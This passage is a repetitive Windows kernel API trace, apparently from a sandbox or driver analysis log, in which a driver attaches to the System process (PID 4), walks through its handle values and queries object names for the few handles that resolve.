[0258.986] PsAcquireProcessExitSynchronization () returned 0x0 [0258.986] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.986] ObReferenceObjectByHandle (in: Handle=0xffffffff80001020, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.986] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.986] PsReleaseProcessExitSynchronization () returned 0x2 [0258.986] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f982 [0258.986] IoCompleteRequest () returned 0x0 [0258.986] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.986] PsAcquireProcessExitSynchronization () returned 0x0 [0258.986] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.986] ObReferenceObjectByHandle (in: Handle=0xffffffff80001030, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.986] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.986] PsReleaseProcessExitSynchronization () returned 0x2 [0258.986] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f981 [0258.986] IoCompleteRequest () returned 0x0 [0258.986] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.986] PsAcquireProcessExitSynchronization () returned 0x0 [0258.986] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.986] ObReferenceObjectByHandle (in: Handle=0xffffffff80001034, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.986] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.986] PsReleaseProcessExitSynchronization () returned 0x2 [0258.986] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f980 [0258.986] IoCompleteRequest () returned 0x0 [0258.986] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.986] PsAcquireProcessExitSynchronization () returned 0x0 [0258.986] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.986] ObReferenceObjectByHandle (in: Handle=0xffffffff80001038, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a3f3870, HandleInformation=0x0) returned 0x0 [0258.986] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.986] PsReleaseProcessExitSynchronization () returned 0x2 [0258.986] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f97f [0258.986] ObQueryNameString (in: Object=0xffffe0006a3f3870, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.986] ObfDereferenceObject (Object=0xffffe0006a3f3870) returned 0x8000 [0258.986] IoCompleteRequest () returned 0x0 [0258.986] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.986] PsAcquireProcessExitSynchronization () returned 0x0 [0258.986] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.986] ObReferenceObjectByHandle (in: Handle=0xffffffff80001044, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.986] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.986] PsReleaseProcessExitSynchronization () returned 0x2 [0258.986] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f97e [0258.986] IoCompleteRequest () returned 0x0 [0258.986] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.986] PsAcquireProcessExitSynchronization () returned 0x0 [0258.986] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.986] ObReferenceObjectByHandle (in: Handle=0xffffffff80001060, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.986] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.987] PsReleaseProcessExitSynchronization () returned 0x2 [0258.987] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f97d [0258.987] IoCompleteRequest () returned 0x0 [0258.987] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.987] PsAcquireProcessExitSynchronization () returned 0x0 [0258.987] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.987] ObReferenceObjectByHandle (in: Handle=0xffffffff80001064, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.987] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.987] PsReleaseProcessExitSynchronization () returned 0x2 [0258.987] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f97c [0258.987] IoCompleteRequest () returned 0x0 [0258.987] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.987] PsAcquireProcessExitSynchronization () returned 0x0 [0258.987] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.987] ObReferenceObjectByHandle (in: Handle=0xffffffff8000106c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.987] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.987] PsReleaseProcessExitSynchronization () returned 0x2 [0258.987] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f97b [0258.987] IoCompleteRequest () returned 0x0 [0258.987] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.987] PsAcquireProcessExitSynchronization () returned 0x0 [0258.987] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.987] ObReferenceObjectByHandle (in: Handle=0xffffffff80001070, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.987] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.987] PsReleaseProcessExitSynchronization () returned 0x2 [0258.987] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f97a [0258.987] IoCompleteRequest () returned 0x0 [0258.987] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.987] PsAcquireProcessExitSynchronization () returned 0x0 [0258.987] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.987] ObReferenceObjectByHandle (in: Handle=0xffffffff80001074, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.987] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.987] PsReleaseProcessExitSynchronization () returned 0x2 [0258.987] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f979 [0258.987] IoCompleteRequest () returned 0x0 [0258.987] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.987] PsAcquireProcessExitSynchronization () returned 0x0 [0258.987] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.987] ObReferenceObjectByHandle (in: Handle=0xffffffff80001078, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.987] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.987] PsReleaseProcessExitSynchronization () returned 0x2 [0258.987] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f978 [0258.987] IoCompleteRequest () returned 0x0 [0258.987] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.987] PsAcquireProcessExitSynchronization () returned 0x0 [0258.988] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.988] ObReferenceObjectByHandle (in: Handle=0xffffffff8000107c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.988] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.988] PsReleaseProcessExitSynchronization () returned 0x2 [0258.988] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f977 [0258.988] IoCompleteRequest () returned 0x0 [0258.988] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.988] PsAcquireProcessExitSynchronization () returned 0x0 [0258.988] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.988] ObReferenceObjectByHandle (in: Handle=0xffffffff80001084, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.988] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.988] PsReleaseProcessExitSynchronization () returned 0x2 [0258.988] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f976 [0258.988] IoCompleteRequest () returned 0x0 [0258.988] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.988] PsAcquireProcessExitSynchronization () returned 0x0 [0258.988] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.988] ObReferenceObjectByHandle (in: Handle=0xffffffff80001094, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0007d5b0390, HandleInformation=0x0) returned 0x0 [0258.988] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.988] PsReleaseProcessExitSynchronization () returned 0x2 [0258.988] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f975 [0258.988] ObQueryNameString (in: Object=0xffffe0007d5b0390, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.988] ObfDereferenceObject (Object=0xffffe0007d5b0390) returned 0x8000 [0258.988] IoCompleteRequest () returned 0x0 [0258.988] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.988] PsAcquireProcessExitSynchronization () returned 0x0 [0258.988] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.988] ObReferenceObjectByHandle (in: Handle=0xffffffff80001098, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.988] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.988] PsReleaseProcessExitSynchronization () returned 0x2 [0258.988] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f974 [0258.988] IoCompleteRequest () returned 0x0 [0258.988] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.988] PsAcquireProcessExitSynchronization () returned 0x0 [0258.988] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.988] ObReferenceObjectByHandle (in: Handle=0xffffffff800010a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069974340, HandleInformation=0x0) returned 0x0 [0258.988] ObfDereferenceObject (Object=0xffffe00069974340) returned 0x17ff3 [0258.988] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.988] PsReleaseProcessExitSynchronization () returned 0x2 [0258.988] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f973 [0258.988] IoCompleteRequest () returned 0x0 [0258.988] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.988] PsAcquireProcessExitSynchronization () returned 0x0 [0258.988] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.988] ObReferenceObjectByHandle (in: Handle=0xffffffff800010ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.989] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.989] PsReleaseProcessExitSynchronization () returned 0x2 [0258.989] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f972 [0258.989] IoCompleteRequest () returned 0x0 [0258.989] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.989] PsAcquireProcessExitSynchronization () returned 0x0 [0258.989] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.989] ObReferenceObjectByHandle (in: Handle=0xffffffff800010c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.989] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.989] PsReleaseProcessExitSynchronization () returned 0x2 [0258.989] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f971 [0258.989] IoCompleteRequest () returned 0x0 [0258.989] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.989] PsAcquireProcessExitSynchronization () returned 0x0 [0258.989] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.989] ObReferenceObjectByHandle (in: Handle=0xffffffff800010c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.989] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.989] PsReleaseProcessExitSynchronization () returned 0x2 [0258.989] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f970 [0258.989] IoCompleteRequest () returned 0x0 [0258.989] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.989] PsAcquireProcessExitSynchronization () returned 0x0 [0258.989] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.989] ObReferenceObjectByHandle (in: Handle=0xffffffff800010d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.989] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.989] PsReleaseProcessExitSynchronization () returned 0x2 [0258.989] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f96f [0258.989] IoCompleteRequest () returned 0x0 [0258.989] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.989] PsAcquireProcessExitSynchronization () returned 0x0 [0258.989] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.989] ObReferenceObjectByHandle (in: Handle=0xffffffff800010d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.989] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.989] PsReleaseProcessExitSynchronization () returned 0x2 [0258.989] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f96e [0258.989] IoCompleteRequest () returned 0x0 [0258.989] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.989] PsAcquireProcessExitSynchronization () returned 0x0 [0258.989] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.989] ObReferenceObjectByHandle (in: Handle=0xffffffff800010e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.989] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.989] PsReleaseProcessExitSynchronization () returned 0x2 [0258.989] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f96d [0258.989] IoCompleteRequest () returned 0x0 [0258.990] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.990] PsAcquireProcessExitSynchronization () returned 0x0 [0258.990] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.990] ObReferenceObjectByHandle (in: Handle=0xffffffff800010ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.990] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.990] PsReleaseProcessExitSynchronization () returned 0x2 [0258.990] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f96c [0258.990] IoCompleteRequest () returned 0x0 [0258.990] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.990] PsAcquireProcessExitSynchronization () returned 0x0 [0258.990] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.990] ObReferenceObjectByHandle (in: Handle=0xffffffff800010fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.990] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.990] PsReleaseProcessExitSynchronization () returned 0x2 [0258.990] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f96b [0258.990] IoCompleteRequest () returned 0x0 [0258.990] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.990] PsAcquireProcessExitSynchronization () returned 0x0 [0258.990] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.990] ObReferenceObjectByHandle (in: Handle=0xffffffff80001110, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.990] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.990] PsReleaseProcessExitSynchronization () returned 0x2 [0258.990] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f96a [0258.990] IoCompleteRequest () returned 0x0 [0258.990] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.990] PsAcquireProcessExitSynchronization () returned 0x0 [0258.990] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.990] ObReferenceObjectByHandle (in: Handle=0xffffffff80001114, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.990] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.990] PsReleaseProcessExitSynchronization () returned 0x2 [0258.990] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f969 [0258.990] IoCompleteRequest () returned 0x0 [0258.990] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.990] PsAcquireProcessExitSynchronization () returned 0x0 [0258.990] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.990] ObReferenceObjectByHandle (in: Handle=0xffffffff80001118, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.990] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.990] PsReleaseProcessExitSynchronization () returned 0x2 [0258.990] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f968 [0258.990] IoCompleteRequest () returned 0x0 [0258.990] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.990] PsAcquireProcessExitSynchronization () returned 0x0 [0258.991] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.991] ObReferenceObjectByHandle (in: Handle=0xffffffff80001124, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.991] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.991] PsReleaseProcessExitSynchronization () returned 0x2 [0258.991] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f967 [0258.991] IoCompleteRequest () returned 0x0 [0258.991] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.991] PsAcquireProcessExitSynchronization () returned 0x0 [0258.991] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.991] ObReferenceObjectByHandle (in: Handle=0xffffffff80001128, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.991] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.991] PsReleaseProcessExitSynchronization () returned 0x2 [0258.991] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f966 [0258.991] IoCompleteRequest () returned 0x0 [0258.991] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.991] PsAcquireProcessExitSynchronization () returned 0x0 [0258.991] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.991] ObReferenceObjectByHandle (in: Handle=0xffffffff8000113c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.991] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.991] PsReleaseProcessExitSynchronization () returned 0x2 [0258.991] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f965 [0258.991] IoCompleteRequest () returned 0x0 [0258.991] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.991] PsAcquireProcessExitSynchronization () returned 0x0 [0258.991] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.991] ObReferenceObjectByHandle (in: Handle=0xffffffff80001144, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.991] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.991] PsReleaseProcessExitSynchronization () returned 0x2 [0258.991] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f964 [0258.991] IoCompleteRequest () returned 0x0 [0258.991] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.991] PsAcquireProcessExitSynchronization () returned 0x0 [0258.991] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.991] 